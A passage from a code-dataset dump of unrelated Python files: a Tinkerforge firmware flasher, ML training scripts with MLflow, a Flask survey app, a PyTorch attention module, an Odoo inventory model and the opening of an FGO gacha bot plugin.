bricklets only\n    if not str(device_identifier).startswith('2'):\n        return\n\n    global found_uid\n    found_uid = uid\n\ndef get_first_bricklet_uid(ipcon):\n    ipcon.register_callback(IPConnection.CALLBACK_ENUMERATE, cb_enumerate)\n    ipcon.enumerate()\n    for i in range(1000):\n        if found_uid != None:\n            return found_uid\n        time.sleep(0.01)\n\ndef xmc_flash_firmware(zbin, uid_bricklet=None):\n    start = time.time()\n    try:\n        print('Starting bootloader mode')\n\n\n        try:\n            zf = ZipFile(zbin, 'r')\n        except:\n            print('Could not open Bricklet plugin:\\n\\n' + traceback.format_exc())\n            return False, None\n\n        plugin_data = None\n        for name in zf.namelist():\n            if name.endswith('firmware.bin'):\n                plugin_data = zf.read(name)\n                break\n\n        if plugin_data == None:\n            print('Could not find firmware in zbin')\n            return False, None\n\n        # Now convert plugin to list of bytes\n        plugin = plugin_data\n        regular_plugin_upto = -1\n        for i in reversed(range(4, len(plugin)-12)):\n            if plugin[i] == 0x12 and plugin[i-1] == 0x34 and plugin[i-2] == 0x56 and plugin[i-3] == 0x78:\n                regular_plugin_upto = i\n                break\n\n        if regular_plugin_upto == -1:\n            print('Could not find \"magic number\" in firmware')\n\n        ipcon = IPConnection()\n        ipcon.connect('localhost', 4223)\n        if uid_bricklet == None:\n            uid_bricklet = get_first_bricklet_uid(ipcon)\n            if uid_bricklet == None:\n                print('Could not find any Bricklet')\n                return\n\n        print('Using UID: ' + uid_bricklet)\n\n        device = BrickletUnknown(uid_bricklet, ipcon)\n\n        device.set_bootloader_mode(device.BOOTLOADER_MODE_BOOTLOADER)\n        counter = 0\n        last_exc_tup = None\n        while True:\n            try:\n                if device.get_bootloader_mode() == device.BOOTLOADER_MODE_BOOTLOADER:\n                    break\n            except:\n                last_exc_tup = sys.exc_info()\n\n            if counter == 10:\n                print('Device not in bootloader mode after 2.5s.')\n                traceback.print_exception(*last_exc_tup)\n                return False, None\n\n            time.sleep(0.25)\n            counter += 1\n\n        num_packets = len(plugin)//64\n        index_list = range(num_packets)\n\n        for _ in range(2):\n            if _ == 1:\n                index_list = range(num_packets)\n\n            print('Writing firmware: ' + name)\n            to_write = str(len(index_list) - 1)\n            for position in index_list:\n                start = position*64\n                end = (position+1)*64\n                print('Writing firmware: ' + str(position) + '/' + to_write)\n                device.set_write_firmware_pointer(start)\n                device.write_firmware(plugin[start:end])\n\n            print('Switching from bootloader mode to firmware mode')\n\n            mode_ret = device.set_bootloader_mode(device.BOOTLOADER_MODE_FIRMWARE)\n            if mode_ret != 0 and mode_ret != 2: # 0 = ok, 2 = no change\n                error_str = ''\n                if mode_ret == 1:\n                    error_str = 'Invalid mode (Error 1)'\n                elif mode_ret == 3:\n                    error_str = 'Entry function not present (Error 3)'\n                elif mode_ret == 4:\n                    error_str = 'Device identifier incorrect (Error 4)'\n                elif mode_ret == 5:\n                    error_str = 'CRC Mismatch (Error 5)'\n                else: # unknown error case\n                    error_str = 'Error ' + str(mode_ret)\n\n                # In case of CRC Mismatch we try a second time\n                if mode_ret == 5:\n                    continue\n\n                print('Could not switch from bootloader mode to firmware mode: ' + error_str)\n                return False, None\n\n            # Everything OK, we don't have to try a second time\n            break\n\n        counter = 0\n        last_exc_tup = None\n        while True:\n            try:\n                bootloader_mode = device.get_bootloader_mode()\n                if bootloader_mode == device.BOOTLOADER_MODE_FIRMWARE:\n                    break\n            except:\n                last_exc_tup = sys.exc_info()\n\n            if counter == 10:\n                print('Device not in firmware mode after 2.5s.')\n                traceback.print_exception(*last_exc_tup)\n                return False, None\n\n            time.sleep(0.25)\n            counter += 1\n\n        print('Firmware written and started')\n    except:\n        traceback.print_exc()\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print('Please give .zbin as parameter')\n    else:\n        xmc_flash_firmware(sys.argv[1])\n","repo_name":"Tinkerforge/flash-test","sub_path":"src/flash-test/plugin_system/xmc_flash_firmware.py","file_name":"xmc_flash_firmware.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71877742566","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# String Algorithms\n\n\ndef fun(file_name):\n    string = open(file_name, \"rt\").read().replace(\"\\n\", \"\")\n    string = list(string)\n    #print(string)\n    counts = dict()\n    f = open(\"result_dna.txt\", \"w+\")\n    for words in string:\n        counts[words] = counts.get(words, 0) + 1\n    \n    result = str(counts[\"A\"])+\" \"+str(counts[\"C\"])+\" \"+str(counts[\"G\"])+\" \"+str(counts[\"T\"])\n    f.write(result)\n\n    f.close()\n\n\nif __name__ == '__main__':\n    fun(\"rosalind_dna.txt\")\n","repo_name":"yxj17173/Rosalind","sub_path":"1 Bioinformatics Stronghold/01 Counting DNA Nucleotides.py","file_name":"01 Counting DNA Nucleotides.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42464236382","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nimport lightgbm as lgb\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nimport numpy as np\nimport mlflow\n\ndef run_logistic_regression(X, y, X_test, y_test, params={}):\n    \"\"\"\n    fit logistic regression model and return different metrics\n    params:\n        X - pd.DataFrame/np.array - features for the model\n        y - pd.Series/np.array - target variable\n        X_test - pd.DataFrame/np.array - test features\n        y_test - pd.Series/np.array - test target\n        params - dict - model params\n    \"\"\"\n    lr = LogisticRegression(random_state=1, max_iter=1000, solver='saga', **params)\n    lr.fit(X, y)\n    pred = lr.predict(X_test)\n    return lr, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), 
recall_score(y_test, pred, average='macro')\n\ndef run_random_forest(X, y, X_test, y_test, params={}):\n \"\"\"\n fit random forest model and return different metrics\n params:\n X - pd.DataFrame/np.array - features for the model\n y - pd.Series/np.array - target variable\n X_test - pd.DataFrame/np.array - test features\n y_test - pd.Series/np.array - test target\n params - dict - model params\n \"\"\"\n rf = RandomForestClassifier(random_state=1, n_jobs=4, **params)\n rf.fit(X, y)\n pred = rf.predict(X_test)\n return rf, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), recall_score(y_test, pred, average='macro')\n\ndef run_lightgbm(X, y, X_val, y_val, X_test, y_test, params={}):\n \"\"\"\n fit lightgbm model and return different metrics\n params:\n X - pd.DataFrame/np.array - features for the model\n y - pd.Series/np.array - target variable\n X_val - pd.DataFrame/np.array - validation features\n y_val - pd.Series/np.array - validation target\n X_test - pd.DataFrame/np.array - test features\n y_test - pd.Series/np.array - test target\n params - dict - model params\n \"\"\" \n p = {**{'force_row_wise':True, 'num_threads':4, 'objective': 'multiclass', 'num_class':3, 'metric': 'multi_logloss', 'random_state':1}, **params}\n clf = lgb.LGBMClassifier(verbose=-1, **p)\n callbacks = [lgb.early_stopping(100, verbose=0), lgb.log_evaluation(period=0)]\n clf.fit(X, y, eval_set=[(X, y),(X_val, y_val)], eval_names=['train','val'], callbacks=callbacks)\n pred = clf.predict(X_test)\n\n return clf, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), recall_score(y_test, pred, average='macro')\n\ndef run_ml_flow_experiment(X_train, X_val, X_test, y_train, y_val, y_test, params, experiment_name='', run_section='all', model_desc=''):\n \"\"\"\n fit models and track performance in mlflow\n params:\n X_train - pd.DataFrame/np.array - training features\n y_train - pd.Series/np.array - training target\n X_val - pd.DataFrame/np.array - validation features\n y_val - pd.Series/np.array - validation target\n X_test - pd.DataFrame/np.array - test features\n y_test - pd.Series/np.array - test target\n params - dict - model params\n experiment_name - str - name of the mlflow experiment \n run_section - str - 'all' or selection between ['lr', 'rf', 'lgb']\n model_desc - str - optional description to add when logging\n \"\"\"\n mlflow.set_experiment(experiment_name=experiment_name)\n\n if run_section=='all' or 'lr' in run_section:\n for i,p in enumerate(params['lr']):\n with mlflow.start_run() as run:\n lr, acc, f1, prec, rec = run_logistic_regression(X=np.concatenate((X_train, X_val), axis=0), \n y=np.concatenate((y_train, y_val), axis=0), \n X_test=X_test, y_test=y_test, params=p)\n print('model: logistic regression, accuracy: ',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'logistic regression')\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'lr_{}_{}'.format(model_desc, i))\n\n if run_section=='all' or 'rf' in run_section:\n for i,p in enumerate(params['rf']):\n with mlflow.start_run() as run:\n rf, acc, f1, prec, rec = run_random_forest(X=np.concatenate((X_train, X_val), axis=0), \n y=np.concatenate((y_train, y_val), axis=0), \n X_test=X_test, y_test=y_test, params=p)\n print('model: random forest ','accuracy: 
',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'random forest')\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'rf_{}_{}'.format(model_desc, i))\n\n if run_section=='all' or 'lgb' in run_section: \n for i,p in enumerate(params['lgb']):\n with mlflow.start_run() as run:\n # renamed from 'lgb' to avoid shadowing the lightgbm module import\n lgb_model, acc, f1, prec, rec = run_lightgbm(X=X_train, y=y_train, X_val=X_val, y_val=y_val, X_test=X_test, y_test=y_test, params=p)\n print('model: lightgbm, accuracy: ',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'lightgbm')\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'lgb_{}_{}'.format(model_desc, i))","repo_name":"apantovic/chess_prediction","sub_path":"src/models/train_models.py","file_name":"train_models.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8186776792","text":"from flask import Flask, redirect, request, render_template, session, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom surveys import satisfaction_survey as survey\n\nRESPONSES_KEY = \"responses\"\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"birbsarecool\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ndebug = DebugToolbarExtension(app)\n\n\n@app.route('/')\ndef home():\n return render_template('home.html', survey=survey)\n\n@app.route('/start')\ndef start_survey():\n session[RESPONSES_KEY] = []\n return redirect('questions/0')\n\n@app.route('/questions/<int:id>')\ndef question(id):\n responses = session.get(RESPONSES_KEY)\n\n if(len(responses) == len(survey.questions)):\n return render_template('done.html')\n\n if(len(responses) != id):\n flash(\"You must answer the questions in order\")\n return redirect(f\"/questions/{len(responses)}\")\n \n question = survey.questions[id]\n \n return render_template('question.html', num_q=id+1, question=question)\n\n\n@app.route('/answer', methods=[\"POST\"])\ndef store_answers():\n selection = request.form['answer']\n responses = session[RESPONSES_KEY]\n responses.append(selection)\n session[RESPONSES_KEY] = responses\n\n if (len(responses) == len(survey.questions)):\n return render_template('done.html')\n \n else:\n return redirect(f\"/questions/{len(responses)}\")\n","repo_name":"ambernluu/Flask-Survey","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"69947420326","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\nclass Attention(nn.Module):\n def __init__(self, dropout=0):\n super(Attention, self).__init__()\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, Q, K, V, mask=None):\n K_T = torch.transpose(K, -2, -1)\n QK = torch.matmul(Q, K_T)\n d_k = K.size(-1)\n # attention score\n attention_score = QK/math.sqrt(d_k)\n\n # zero out the masked positions\n # masked_fill: fills positions where mask == 0 with -1e20 (a large negative value becomes ~0 after softmax)\n if mask is not None:\n attention_score = attention_score.masked_fill(mask == 0, -1e20)\n\n attention = F.softmax(attention_score, dim=-1)\n # dropout\n attention = 
self.dropout(attention)\n\n # final attention output\n attention = torch.matmul(attention, V)\n\n return attention\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, head_num, d_model, dropout=0.1):\n super(MultiHeadAttention, self).__init__()\n assert d_model % head_num == 0\n\n self.head_num = head_num\n self.d_model = d_model\n self.d_k = self.d_v = d_model // head_num\n\n self.Q_weigh = nn.Linear(d_model, d_model)\n self.K_weigh = nn.Linear(d_model, d_model)\n self.V_weigh = nn.Linear(d_model, d_model)\n self.O_weigh = nn.Linear(d_model, d_model)\n\n self.attention = Attention()\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, Q, K, V, mask=None):\n # if mask is not None:\n # # Same mask applied to all h heads.\n # mask = mask.unsqueeze(1)\n\n batch_num = Q.size(0)\n\n # view: reshapes the tensor without touching its contents\n Q = self.Q_weigh(Q).view(batch_num, -1, self.head_num, self.d_k).transpose(1, 2)\n K = self.K_weigh(K).view(batch_num, -1, self.head_num, self.d_k).transpose(1, 2)\n V = self.V_weigh(V).view(batch_num, -1, self.head_num, self.d_k).transpose(1, 2)\n\n attention = self.attention(Q, K, V, mask)\n # contiguous(): transpose/view change the memory layout; this re-orders memory so the following view() works\n attention = attention.transpose(1, 2).contiguous().view(batch_num, -1, self.head_num*self.d_k)\n attention = self.O_weigh(attention)\n\n return attention\n","repo_name":"CountingMstar/TextSummarization","sub_path":"my_bert/transformer/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"34204386849","text":"from functools import reduce\r\n\r\ndef add(x,y):\r\n return x+y\r\n\r\n\r\nclass Perceptron(object):\r\n def __init__(self,input_num,activator):\r\n self.activator = activator\r\n self.weights = [0.0 for _ in range(input_num)]\r\n self.bias = 0.0\r\n\r\n def __str__(self):\r\n return 'weights\\t:%s\\nbias\\t:%f\\n' % (self.weights, self.bias)\r\n\r\n def predict(self,input_vec):\r\n pack = zip(input_vec,self.weights)\r\n multi = []\r\n for (x,w) in pack:\r\n multi.append(x*w)\r\n activation = reduce(add, multi)\r\n\r\n return self.activator(activation + self.bias)\r\n\r\n def train(self,input_vecs,labels,iteration,rate):\r\n for i in range(iteration):\r\n self._one_iteration(input_vecs,labels,rate)\r\n\r\n def _one_iteration(self,input_vecs,labels,rate):\r\n samples = zip(input_vecs,labels)\r\n for (input_vecs,labels) in samples:\r\n output = self.predict(input_vecs)\r\n self._update_weights(input_vecs,output,labels,rate)\r\n\r\n\r\n def _update_weights(self,input_vecs,output,labels,rate):\r\n delta = labels -output\r\n pack = zip(input_vecs,self.weights)\r\n tmp = []\r\n for (x,w) in pack:\r\n tmp.append(w+x*delta*rate)\r\n self.weights = tmp\r\n self.bias = self.bias + delta*rate\r\n\r\ndef f(x):\r\n if x>0:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef get_train_dataset():\r\n input_vecs = [[1,1],[0,0],[1,0],[0,1]]\r\n labels = [1,0,0,0]\r\n return input_vecs,labels\r\n\r\ndef train_and_perception():\r\n p = Perceptron(2,f)\r\n input_vecs,labels =get_train_dataset()\r\n p.train(input_vecs,labels,10,0.1)\r\n return p\r\n\r\nif __name__=='__main__':\r\n and_perception = train_and_perception()\r\n print(and_perception)\r\n print('1 and 1 = %d' % and_perception.predict([1, 1]))\r\n print('0 and 0 = %d' % and_perception.predict([0, 0]))\r\n print('1 and 0 = %d' % and_perception.predict([1, 0]))\r\n print('0 and 1 = %d' % and_perception.predict([0, 
1]))","repo_name":"yunhao138/deepLearning","sub_path":"src/deeplearning/py3.x/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"71016100325","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n more_info_url = fields.Char('More Info URL', compute='_get_more_info_url')\n dropship_shipping_cost = fields.Float('Dropship Shipping Cost', compute='_compute_qty_autoplus')\n dropship_handling_cost = fields.Float('Dropship Handling Cost', compute='_compute_qty_autoplus')\n dropship_base_cost = fields.Float('Dropship Base Cost', compute='_compute_qty_autoplus')\n dropship_total_cost = fields.Float('Dropship Total Cost', compute='_compute_qty_autoplus')\n\n @api.multi\n @api.depends()\n def _get_more_info_url(self):\n for p in self:\n p.more_info_url = '/autoplus/products/' + str(p.id)\n\n @api.multi\n def _compute_qty_autoplus(self):\n for product_tmpl_id in self:\n qty_onhand = 0.0\n dropship_base_cost = 0.0\n dropship_handling_cost = 0.0\n dropship_shipping_cost = 0.0\n dropship_total_cost = 0.0\n\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n if product_tmpl_id.mfg_code in ['BXLD', 'GMK']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, C2C.DomesticCost as dropship_base_cost, C2C.ShippingCost as dropship_shipping_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN C2C.dbo.Warehouse C2C on C2C.PartNumber = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n elif product_tmpl_id.mfg_code in ['BFHZ', 'REPL', 'STYL', 'NDRE', 'BOLT', 'EVFI']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, USAP.Cost as dropship_base_cost, USAP.ShippingPrice as dropship_shipping_cost, USAP.HandlingPrice as dropship_handling_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN USAP.dbo.Warehouse USAP on USAP.PartNo = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n elif product_tmpl_id.mfg_code in ['PPR']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, USAP.Cost as dropship_base_cost, USAP.ShippingPrice as dropship_shipping_cost, USAP.HandlingPrice as dropship_handling_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN USAP.dbo.Warehouse USAP on USAP.PartNo = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n if query:\n result = self.env['sale.order'].autoplus_execute(query)\n if result:\n qty_onhand = float(result[-1]['qty_onhand']) if result[-1]['qty_onhand'] > 0 else 0.0\n dropship_base_cost = float(result[-1]['dropship_base_cost']) if 'dropship_base_cost' in result[-1] and result[-1]['dropship_base_cost'] > 0 else 0.0\n dropship_shipping_cost = float(result[-1]['dropship_shipping_cost']) if 'dropship_shipping_cost' in result[-1] and result[-1]['dropship_shipping_cost'] > 0 else 0.0\n dropship_handling_cost = float(result[-1]['dropship_handling_cost']) if 'dropship_handling_cost' in result[-1] and result[-1]['dropship_handling_cost'] > 
0 else 0.0\n dropship_total_cost = float(result[-1]['dropship_total_cost']) if 'dropship_total_cost' in result[-1] and result[-1]['dropship_total_cost'] > 0 else 0.0\n product_tmpl_id.qty_onhand = qty_onhand\n product_tmpl_id.dropship_base_cost = dropship_base_cost\n product_tmpl_id.dropship_handling_cost = dropship_handling_cost\n product_tmpl_id.dropship_shipping_cost = dropship_shipping_cost\n product_tmpl_id.dropship_total_cost = dropship_total_cost\n\n @api.multi\n def _compute_purchase_info(self):\n return\n","repo_name":"ilyasProgrammer/Odoo-eBay-Amazon","sub_path":"product_info/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"}
+{"seq_id":"38802245140","text":"import yaml\nfrom typing import List, Dict\nfrom itertools import tee, filterfalse\n\ndef load_config(config_path: str):\n '''Opens the YAML config file at the given path. '''\n try:\n with open(config_path, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n except FileNotFoundError:\n raise Exception(f'Config file not found at path {config_path}.')\n except Exception as e:\n raise e\n\ndef check_config(config: Dict, top_level_key: str, config_keys: List[str], obj=None):\n '''config should be a dictionary containing settings.\n top_level_key should be a top-level key in config, corresponding to a particular set of keys/values. \n config_keys should be a list of keys to check for in section.\n obj should be an optional reference to the Python object to which to add the config keys/values as attributes. Otherwise, they are returned as a dict.'''\n try:\n if top_level_key not in config:\n raise Exception(f'Config should contain a dictionary of settings, stored under the {top_level_key} key.')\n config_keys = set(config_keys)\n # Test for the presence of the required API settings\n if not config_keys <= set(config[top_level_key].keys()):\n raise Exception(f'One or more settings missing under the {top_level_key} key.')\n # For convenience, convert to class attributes\n if obj:\n for c in config_keys:\n setattr(obj, c, config[top_level_key][c])\n return obj\n else:\n return config[top_level_key]\n except Exception as e:\n raise Exception(\"Error loading configuration.\") from e\n\ndef partition(pred, iterable):\n '''Use a predicate to partition entries into false entries and true entries. 
From itertools recipes'''\n t1, t2 = tee(iterable)\n return filterfalse(pred, t1), filter(pred, t2)","repo_name":"gwu-libraries/libcal_pp_integration","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20874342023","text":"import asyncio\nimport io\nimport json\nimport os\n\nfrom jsonpath import jsonpath # noqa\nfrom typing import Union, List\n\nfrom PIL import Image, ImageFont, ImageDraw\nfrom aiocqhttp import MessageSegment\nfrom playwright.async_api import async_playwright\n\nfrom hoshino import config, util, aiorequests, logger, Service, priv\nfrom hoshino.typing import CQEvent\n\nsv_help = '''\n# 抽卡模拟相关\n[fgo十连] fgo抽卡\n[fgo百连] 100抽\n[获取fgo卡池] 从mooncell获取卡池数据\n[查询fgo卡池] 查询本地缓存的卡池以及本群卡池\n[切换fgo卡池 + 卡池编号] 切换需要的卡池\n[切换fgo日替卡池 + 卡池编号 + 日替卡池编号] 切换需要的日替卡池\n'''.strip()\n\nsv = Service(\n name='fgo抽卡',\n help_=sv_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_fetch_help = '''\n# 数据管理相关\n[获取全部内容] 获取从者/礼装/纹章的相关内容\n- 从者包括职介和指令卡\n- 礼装/纹章包括技能\n- 子命令:\n - [获取全部从者]\n - [获取全部礼装]\n - [获取全部纹章]\n[下载全部卡片资源] 从上述数据中下载对应静态资源\n- 子命令:\n - [下载全部从者资源]\n - [下载全部礼装资源]\n - [下载全部纹章资源]\n'''.strip()\n\nsv_fetch = Service(\n name='fgo数据获取',\n help_=sv_fetch_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_lib_help = '''\n# fgo数据库相关\n``[更新fgo图书馆]`` 获取从者/礼装/纹章的相关详细数据,包括属性、白值等\n- 支持附带类型参数以更新指定内容\n- 类型参数:从者/礼装/纹章/最新\n - 当参数含有最新时,只会获取本地不存在的内容\n - 支持种类与最新同时存在\n- **※需要先执行``[获取全部内容]``**\n\n``[增添fgo图书馆 + 类型 + id]`` 在本地已存在图书馆的情况下,手动增添新数据,以避免每次数据更新都需要重新爬一次全部内容\n- 类型:从者、礼装、纹章\n\n``[查询最新图书馆 + 类型]`` 获取最近的内容\n\n``[修补fgo图书馆 + 类型 + id]`` 单独修补某张卡片的详细数据\n- 类型为:从者、礼装、纹章\n- **※需要先执行``[更新fgo图书馆]``**\n\n``[fgo从者查询 + 关键词(至少一个)]`` 通过关键词搜索从者\n- 若关键词大于两个,只会返回同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据,附带参数``数据``则不显示卡面只显示游戏数据\n- 当输入参数存在id{卡片id}时,直接返回对应id的卡片\n - 例子:``查询fgo从者 id312``\n\n``[fgo礼装查询 + 关键词(至少一个)]`` 通过关键词搜索礼装\n- 若关键词大于两个,只会搜索同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据\n- 查询特定id的礼装同上\n\n``[fgo纹章查询 + 关键词(至少一个)]`` 通过关键词搜索礼装\n- 若关键词大于两个,只会搜索同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据\n- 查询特定id的纹章同上\n'''.strip()\n\nsv_lib = Service(\n name='fgo图书馆',\n help_=sv_lib_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_lucky_help = '''\n[更新fgo福袋] 获取福袋信息\n- 初次查询福袋之前务必先执行此命令\n[查询fgo福袋 + 概况] 查询全部福袋的文字概况\n[查询fgo福袋 + 国服/日服] 查询当前存在的福袋数据\n- [查询fgo福袋 + 国服/日服 + 福袋编号] 查询对应顺序的福袋详细数据\n- [查询fgo福袋 + 国服/日服 + 全部] 查询全部福袋详细数据\n[查询fgo福袋 + 未来] 查询国服千里眼福袋数据\n[抽fgo福袋 + 国服/日服 + 福袋编号 + 子池子编号(默认为1)] 抽福袋\n'''.strip()\n\nsv_lucky = Service(\n name='fgo福袋',\n help_=sv_lucky_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_manage_help = '''\n# 抽卡管理命���:\n[fgo数据初始化] 初始化数据文件及目录,务必安装后先执行此命令!\n[fgo数据下载] 下载从者及礼装图标,务必先初始化数据再执行下载!\n[跟随最新/剧情卡池] 设置卡池数据更新后跟随最新国服卡池还是国服剧情卡池\n[fgo_enable_crt + crt文件路径] 为下载配置crt文件以规避拒绝访问,留空为默认,False为禁用\n[fgo_check_crt] 检查本群crt文件配置状态\n[重载配置文件] 为本群新建默认配置或还原至默认配置,同时修补其他群的配置\n[切换抽卡样式 + 样式] 切换抽卡样式,可选样式:\n- 文字:旧版简约图标\n- 图片:仿真实抽卡\n[设置fgo时间 + 小时 + 分钟 + 秒] 设置自动更新时间间隔,至少输入其中一个参数\n- 例如:``设置fgo时间 1小时60分钟60秒``\n'''.strip()\n\nsv_manage = Service(\n name='fgo管理',\n help_=sv_manage_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 
管理权限\n)\n\nsv_news_help = '''\n# 新闻相关:\n[获取fgo新闻 + 数量] 从官网获取公告新闻,默认6条,置顶的概率公告会去掉\n[查询fgo新闻 + 编号/all] 从本地查询公告具体内容,all代表全部获取\n- 可以在末尾附加参数``pic``不使用截图\n[清除新闻缓存] 移除新闻截图\n'''.strip()\n\nsv_news = Service(\n name='fgo新闻获取',\n help_=sv_news_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nheight = 194\nwidth = 178\ndis = 23\nfloor = 48\nst1w = 92\nst1h = 200\nst2 = 192\n\nbox_list = []\n\nbox1 = (st1w, st1h)\nfor box_i in range(6):\n box_list.append(box1)\n lst = list(box1)\n lst[0] += width + dis\n box1 = tuple(lst)\n\nbox2 = (st2, st1h + height + floor)\nfor box_i in range(5):\n box_list.append(box2)\n lst = list(box2)\n lst[0] += width + dis\n box2 = tuple(lst)\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) \",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-cn\"\n}\n\nbanned_id = [\"333\", \"240\", \"168\", \"151\", \"152\", \"149\", \"83\"]\n\nbasic_path = os.path.join(config.RES_DIR, \"img\", \"fgo\")\nicon_path = os.path.join(basic_path, \"icons\")\nsvt_path = os.path.join(icon_path, \"svt_icons\")\ncft_path = os.path.join(icon_path, \"cft_icons\")\nskill_path = os.path.join(icon_path, \"skill_icons\")\ncmd_path = os.path.join(icon_path, \"cmd_icons\")\ncard_path = os.path.join(icon_path, \"card_icons\")\nclass_path = os.path.join(icon_path, \"class_icons\")\n\nres_paths = [basic_path, icon_path, svt_path, cft_path, skill_path, cmd_path, card_path, class_path]\n\nruntime_path = os.path.dirname(__file__)\n\ndata_path = os.path.join(runtime_path, 'data')\nnews_img_path = os.path.join(runtime_path, 'news')\nbanner_path = os.path.join(data_path, 'banner.json')\nconfig_path = os.path.join(data_path, 'config.json')\npools_path = os.path.join(data_path, 'pools.json')\ngacha_path = os.path.join(data_path, 'gacha.json')\nlucky_path = os.path.join(data_path, 'lucky_bag.json')\nbanner_data_path = os.path.join(data_path, 'b_data.json')\nupdate_data_path = os.path.join(data_path, 'update.json')\n\nold_pools_path = os.path.join(runtime_path, 'data/old_pools.json')\n\nnews_path = os.path.join(data_path, 'news.json')\nnews_detail_path = os.path.join(data_path, 